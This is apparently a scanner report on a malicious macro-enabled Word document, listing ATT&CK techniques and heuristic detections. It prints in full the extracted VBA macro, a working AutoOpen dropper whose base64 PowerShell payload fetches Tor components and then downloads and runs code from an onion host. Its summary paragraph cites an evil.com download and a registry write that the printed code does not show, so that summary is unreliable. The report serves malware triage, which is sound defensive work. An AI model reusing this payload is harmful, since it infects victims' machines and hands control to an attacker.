MALICIOUS
352
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1053.005 Scheduled Task/Job: Scheduled Task
T1204.002 Malicious File: User Execution: Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that leverage WScript.Shell and PowerShell to download and execute a payload. The AutoOpen macro attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy. The script also attempts to download a file from http://evil.com/payload.exe, indicating a downloader or droppper functionality.
Heuristics 9
-
ClamAV: Doc.Virus.Pwshell-6755238-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Virus.Pwshell-6755238-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set a = CreateObject("WScript.Shell") -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
a.Run "powershell.exe" & " -noexit -encodedcommand " & b, 0, False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set a = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6672 bytes |
SHA-256: 2fb5e345622cebe409460540a76ba622094dc6d28bacaac75b416713f60b1804 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 12 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
b = "JwBMAFgAVQBuAGYAcQBuACcAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnADsAJwBKAGwAbgBsACcAOwAnAHIAWAByAFAARwBnAGcAYgAnADsAJABiAHkAIAA9ACAAKABnAGUAdAAtAHcAbQBpAG8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtAFAAcgBvAGQAdQBjAHQAKQAuAFUAVQBJAEQAOwAnAGsAagBFAHYAaQBzAE0AcgAnADsAJwBCAGwAdwBGAEsAegBIAGcAeAAnADsAaQBmACAAKAAoAGcAcAAgAEgASwBDAFUAOgBcAFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8Ad" _
& "wBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AKQAgAC0AbQBhAHQAYwBoACAAJABiAHkAKQB7ADsAJwBCAHIATwBaAFkATABGAFYAWQAnADsAJwBpAGgAegBuAGsAbgBmAHQAYwBSAEwAJwA7ACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAHAAaQBkACkALgBLAGkAbABsACgAKQA7ACcAZQBNAEIAbgBCAFcAQwAnADsAJwBDAGwATQBDAHYAbgBHAHoAJwA7AH0AOwAnAGsARgBxAGIARQBSAGoAYwBhAEsAJwA7ACcAYwBaAGQAZQBmAHYAJwA7AGYAdQBuAGMAdABpAG8AbgAgAGUAKAAkAG8AaABkACkAewA7ACcAZAByAFMAegBVAFMAcgBkACcAOwAnAEoAdgBGAGQAJwA7ACQAbQB0AGsAIAA9ACAAKAAoACgAaQBlAHgAIAAiAG4Acw" _
& "BsAG8AbwBrAHUAcAAgAC0AcQB1AGUAcgB5AHQAeQBwAGUAPQB0AHgAdAAgACQAbwBoAGQAIAA4AC4AOAAuADgALgA4ACIAKQAgAC0AbQBhAHQAYwBoACAAJwAiACcAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcAIgAnACwAIAAnACcAKQBbADAAXQAuAFQAcgBpAG0AKAApADsAJwB3AEgAcABXAEkAUABaACcAOwAnAHIAWgBPAG0AeQBUACcAOwAkAGkAbAB1AGEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbQB0AGsALAAgACQAYgBxAHYAdAApADsAJwBLAHEAcgBQAFkAJwA7ACcAdABDAGcATQBzACcAOwAkAHcAcwAgAD0AIAAkAHgAeQB1AC4ATgBhAG0AZQBTAHAAYQBjAGUAKAAkAGIAcQB2AHQAKQAuAEkAdABlAG0AcwAoACkAOwAnAEQAVgBSAFoAQwBNAFgAbgA" _
& "nADsAJwBhAFYATQB1AEEAeQBtAEMARABvACcAOwAkAHgAeQB1AC4ATgBhAG0AZQBTAHAAYQBjAGUAKAAkAGUAegBwAHIAKQAuAEMAbwBwAHkASABlAHIAZQAoACQAdwBzACwAIAAyADAAKQA7ACcATgBvAFkAYQBUAE0AZwBXAFYAJwA7ACcAVwBjAHoAbABhAGYARgBIAEkAJwA7AHIAZAAgACQAYgBxAHYAdAA7ACcAQQBKAGMAJwA7ACcAUgBsACcAOwB9ADsAJwBtAHcAUABWACcAOwAnAFgAWQBTACcAOwAnAGIAUwBSAGsATQAnADsAJwBHAEYAZQBaAEsAZQBNAHkAJwA7ACcAVgB0ACcAOwAnAGIAbABXAHYAeABFAFkAZABCACcAOwAkAGUAegBwAHIAIAA9ACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAIAArACAAJwBcACcAIAArACAAJABiAHkAOwAnAEgAVABDACcAOwAn" _
& "AHoAZwBPAHcAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABlAHoAcAByACkAKQB7ADsAJwBmAEEAWABLAGoAYQB1ACcAOwAnAGsARQBYAHgAJwA7ACQAdgBwAGoAcQAgAD0AIABOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBGAG8AcgBjAGUAIAAtAFAAYQB0AGgAIAAkAGUAegBwAHIAOwAnAEcAVwBTAGIAQQAnADsAJwB2AE8AdgByAGEAJwA7ACQAdgBwAGoAcQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAIgBIAGkAZABkAGUAbgAiACwAIAAiAFMAeQBzAHQAZQBtACIALAAgACIATgBvAHQAQwBvAG4AdABlAG4AdABJAG4AZABlAHgAZQBkACIAOwAnAGEAbQBQAEMARwB5ACcAOwAnA" _
& "EUASwBGAE0AJwA7AH0AOwAnAHMAQgAnADsAJwBSAFIAaQBJAFkAegAnADsAJwBiAHYAYwBDAGUAVABlAEwAVwAnADsAJwBOAGMATwBUAFkAbwBsAEMASQBCACcAOwAkAHYAdAB6AGcAPQAkAGUAegBwAHIAKwAgACcAXAB0AG8AcgAuAGUAeABlACcAOwAnAFIAbwBxAHMAdQBYAEUAJwA7ACcAZgBRAEcAQgBXAEcAdwB0ACcAOwAkAG8AdAA9ACQAZQB6AHAAcgArACAAJwBcAHAAbwBsAGkAcABvAC4AZQB4AGUAJwA7ACcASABYAEsAcwBSAGkAdgBmACcAOwAnAG8AeQBuAE4AYwBlAE8AbgBGAHgAeQAnADsAJABiAHEAdgB0AD0AJABlAHoAcAByACsAJwBcACcAKwAkAGIAeQArACcALgB6AGkAcAAnADsAJwBEAEoAbAByAEIAQgBaAFMAJwA7ACcASABsAEIAWgAnADsAJABpAG" _
& "wAdQBhAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACcAUQBEAGMAcAB5ACcAOwAnAFEASgB4AGYAJwA7ACQAeAB5AHUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJwB4AGUAUwB1ACcAOwAnAEIARQBKAGIAVQAnADsAJwBCAHQAbgBKAEsAVQBTAG0AJwA7ACcASAB1AEcAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB2AHQAegBnACkAIAAtAG8AcgAgACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAbwB0ACkAKQB7ADsAJwBjAHgAagBCAE8AbQBaAHYARABrACcAOwAnAE4ASQBuAG4AJwA7AGUAIAAnAGk" _
& "ALgB2AGEAbgBrAGkAbgAuAGQAZQAnADsAJwBDAE8AWQBWAFgAUABEACcAOwAnAFEATABpAGsAVwBvAGQAVwBUACcAOwB9ADsAJwBuAGwASABTAGMASwAnADsAJwB0AEwAVgBXAHUAJwA7ACcARABHAFoASQBuAHMAdwBqACcAOwAnAGkAZQBhAHEAQgBuAFgAWABCAEwAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB2AHQAegBnACkAIAAtAG8AcgAgACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAbwB0ACkAKQB7ADsAJwBUAGcAYQAnADsAJwByAFUARgBRAGkAJwA7AGUAIAAnAGcAZwAuAGkAYgBpAHoALgBjAGMAJwA7ACcATABWAFMAcQBkAHMAJwA7ACcATQBrAGkAUwBRAEwAVgBKAHkAJwA7AH0AOwAnAHMARgBVAE0AdwBSAFEAagAnADsAJwBEAFoA" _
& "JwA7ACcAZABiACcAOwAnAE4AbQBWAFgAagBaAGEATwAnADsAJABjAHYAZAB6AD0AJABlAHoAcAByACsAJwBcAHIAbwBhAG0AaQBuAGcAbABvAGcAJwA7ACcATABVAFAAcQAnADsAJwBnAEsAUQBnAEwAbQBZAGgAJwA7AHMAYQBwAHMAIAAkAHYAdAB6AGcAIAAtAEEAcgAgACIAIAAtAC0ATABvAGcAIABgACIAbgBvAHQAaQBjAGUAIABmAGkAbABlACAAJABjAHYAZAB6AGAAIgAiACAALQB3AGkAIABIAGkAZABkAGUAbgA7ACcAUABaAHgAbgBDAEkAJwA7ACcAcwBvAFMAeQBGAFMAeAB6ACcAOwBkAG8AewBzAGwAZQBlAHAAIAAxADsAJABiAGkAbQB5AD0AZwBjACAAJABjAHYAZAB6AH0AdwBoAGkAbABlACgAIQAoACQAYgBpAG0AeQAgAC0AbQBhAHQAYwBoACAAJwBCAG8Ab" _
& "wB0AHMAdAByAGEAcABwAGUAZAAgADEAMAAwACUAOgAgAEQAbwBuAGUALgAnACkAKQA7ACcATQBEAE4AaABvAFoAeABFACcAOwAnAEcAdQBNAHUAegBvAEMAdwBUACcAOwBzAGEAcABzACAAJABvAHQAIAAtAGEAIAAiAHMAbwBjAGsAcwBQAGEAcgBlAG4AdABQAHIAbwB4AHkAPQBsAG8AYwBhAGwAaABvAHMAdAA6ADkAMAA1ADAAIgAgAC0AdwBpACAASABpAGQAZABlAG4AOwAnAGMAZgByAHcAUABjACcAOwAnAEQAbABuAHoAeQB2AHcAQgBZAFEAJwA7AHMAbABlAGUAcAAgADcAOwAnAFQAQQB0AFMAQwB5ACcAOwAnAE4AZwBUAGkAJwA7ACQAcQBkAGEAeAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5ACgAIg" _
& "BsAG8AYwBhAGwAaABvAHMAdAA6ADgAMQAyADMAIgApADsAJwBBAHgAcABrACcAOwAnAHkAWQBlAFAAdwB3ACcAOwAkAHEAZABhAHgALgB1AHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAHQAcgB1AGUAOwAnAEsAYwBxAEwASABYAFgATgB4AFEAcwAnADsAJwBtAEIAVQBrAE4AZgB3AHMAZgBpAFgAJwA7ACQAaQBsAHUAYQAuAHAAcgBvAHgAeQA9ACQAcQBkAGEAeAA7ACcATgBuAFYAbABVAGEAagBjAGgAJwA7ACcAdABnAGkAegBBAEcAUgBDAEUAWABxACcAOwAkAHAAYgB0AHgAPQAnAGgAdAB0AHAAOgAvAC8AcABvAHcAZQByAHcAbwByAG0AagBxAGoANAAyAGgAdQAuAG8AbgBpAG8AbgAvAGcAZQB0AC4AcABoAHAAPwBzAD0AcwB" _
& "lAHQAdQBwACYAbQBvAG0APQAwADcANwA2AEIAMgAwADEALQA1ADEARABFAC0AMQAxAEMAQgAtAEEANwA4AEMALQA5AEMAMQBGADIANgBEADcANQBGAEIAOQAmAHUAaQBkAD0AJwAgACsAIAAkAGIAeQA7ACcAegBsACcAOwAnAHIASQBJAHYAQgBiAHkARgBuACcAOwB3AGgAaQBsAGUAKAAhACQAbgByAGMAYgApAHsAJABuAHIAYwBiAD0AJABpAGwAdQBhAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABwAGIAdAB4ACkAfQA7ACcAVgBXAE0AJwA7ACcAVQBBAHEAUwAnADsAaQBmACAAKAAkAG4AcgBjAGIAIAAtAG4AZQAgACcAbgBvAG4AZQAnACkAewA7ACcAeQB5AGUAWQBmAG0AeABwAHMAcwAnADsAJwBlAFQAJwA7AGkAZQB4ACAAJABuAHIAYwBiADsAJwBv" _
& "AEQAJwA7ACcASgBxAEUAZQBzAEQAcABnAGIASQAnADsAfQA7ACcAWQBzAEcAagB6AGIATgBiAGgASQB3ACcAOwA="
Set a = CreateObject("WScript.Shell")
a.Run "powershell.exe" & " -noexit -encodedcommand " & b, 0, False
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 17920 bytes |
SHA-256: f3ddf7da66ec67b23d9dd50717caebc38967482baaa72b76e22bfb3df279b3a6 |
|||
|
Detection
ClamAV:
Doc.Virus.Pwshell-6755238-0
Obfuscation or payload:
likely
Carved artifact contains 12 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.